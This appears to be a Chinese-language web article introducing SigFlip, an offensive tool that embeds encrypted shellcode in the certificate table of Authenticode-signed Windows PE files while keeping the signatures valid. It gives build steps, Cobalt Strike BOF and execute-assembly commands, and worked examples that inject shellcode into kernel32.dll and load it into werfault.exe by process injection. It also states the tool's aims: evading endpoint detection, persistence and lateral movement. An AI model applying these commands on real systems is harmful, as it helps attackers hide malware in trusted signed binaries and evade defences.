SigFlip如何篡改身份認證碼簽名的PE文件

SigFlip是一款能夠篡改經過身份認證碼簽名的PE文件（exe、dll、sys等）的工具，而且整個過程不會影響或破壞已有的身份認證碼簽名。

關於SigFlip

SigFlip是一款能夠篡改經過身份認證碼簽名的PE文件(exe、dll、sys等)的工具，而且整個過程不會影響或破壞已有的身份認證碼簽名。換句話來說，就是我們可以使用SigFlip向PE文件中嵌入數據(比如Shellcode)，並且再不會破壞文件簽名、完整性檢查或PE文件功能的情況下，修改PE文件的校驗和或哈希。

SigInject組件可以將Shellcode注入至PE文件的[WIN_CERTIFICATE]證書表中，並輸出加密密鑰以便配合BOF/C/C#加載器(SigLoader)一起使用。SigInject將保存針對PE文件的修改操作，並保證其簽名和證書有效性不變。

SigLoader是一個基礎加載器，它採用SigInject創建的修改後的PE文件路徑和解密密鑰作爲參數，然後提取和解密嵌入的Shellcode，以供選擇Shellcode注入使用。

SigFlip將檢查PE哈希是否已成功更改，然後退出以繞過終端針對此類行爲的檢查。

SigFlip可以用於持久化感染、橫向滲透以及命令/代碼執行等場景。

注意事項：igFlip、SigInject和SigLoader將以BOF腳本和.NET程序集提供。

工具安裝

廣大研究人員可以使用下列命令將該項目源碼克隆至本地：

git clone https://github.com/med0x2e/SigFlip.git

工具構建/編譯

本項目並沒有提供預編譯的BOF，我們可以使用Mingw-w64來進行編譯。如果是.NET，可以使用VS或csc.exe來編譯.NET項目(SigFlip、SigLoader);如果是BOF，請按照下列步驟操作：

➜ i686-w64-mingw32-gcc -c sigflip.c -o sigflip.x86.o 
 
➜ x86_64-w64-mingw32-gcc -c sigflip.c -o sigflip.x64.o 
 
➜ x86_64-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x64.o 
 
➜ i686-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x86.o

確保所有的對象文件都存儲在sigflip.cna的相同目錄下，然後在Cobalt Strike中加載sigflip.cna。

注意事項：預編譯的BOF使用的是mingw-64 v8.0.0_3，如果你所使用的mingw-64 >= v9，可能會出現崩潰的情況。

Cobalt Strike

執行程序集：

execute-assembly SigFlip.exe -h 
 
execute-assembly SigLoader -h

BOF：

當我們在Cobalt Strike中加載sigflip.cna了之後，將會註冊兩個新命令，我們此時就能夠以下列方式使用SigFlip和SigInject了。

SigFlip：在不破壞簽名或證書有效性的情況下，修改PE文件哈希：
```
SigFlip "" ""
```
SigInject：向PE文件的[WIN_CERTIFICATE]證書表中注入加密的Shellcode，打印的加密密鑰可以跟基礎C/C#加載器結合使用以保證簽名和證書的完整性：
```
SigInject " " ""
```
SigLoader：從PE文件中加載由SigInject加密的Shellcode，然後使用Early Bird向指定進程注入Shellcode，我們可以自定義Shellcode的注入邏輯，或直接替換目標代碼：
```
SigLoader
```

工具使用樣例

(1) BOF

向msbuild.exe注入隨機數據：

SigFlip "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" "C:\lolbins\modified-msbuild.exe"

向kernel32.ell注入Shellcode：

SigInject "C:\Windows\System32\kernel32.dll" "C:\random\modified-kernel32.dll" "C:\shellcode\cobaltstrike_or_msf_shellcode.bin" 
 
Sigloader "C:\random\modified-kernel32.dll" "DECRYPTION_KEY" "C:\Windows\System32\werfault.exe" 6300

(2) 執行程序集

向msbuild.exe注入隨機數據：

execute-assembly SigFlip.exe -b C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -o C:\Temp\MSBuild.exe

向kernel32.ell注入Shellcode：

execute-assembly SigFlip.exe -i C:\Windows\System32\kernel32.dll -s C:\Temp\x86shellcode.bin -o C:\Temp\kernel32.dll -e TestSecretKey 
 
execute-assembly SigLoader.exe -f C:\Temp\modified-kernel32.dll -e TestSecretKey -pid 2354

本文地址：https://www.linuxprobe.com/sigflip-pe-shellcode.html

發表評論

所有評論

還沒有人評論，想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.

SigFlip如何篡改身份認證碼簽名的PE文件

35K*14 薪，入職了！這公司只要不裁員，我能一直呆下去！

企業的組織架構對技術架構的影響

10 張圖幫你搞定 TensorFlow 數據讀取機制

Zorin OS 16.3 發佈：無縫升級和卓越改進！

Linux Sudo 史上最大bug

Mir 2.14 正式發佈，Ubuntu 使用的 Linux 顯示服務器

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結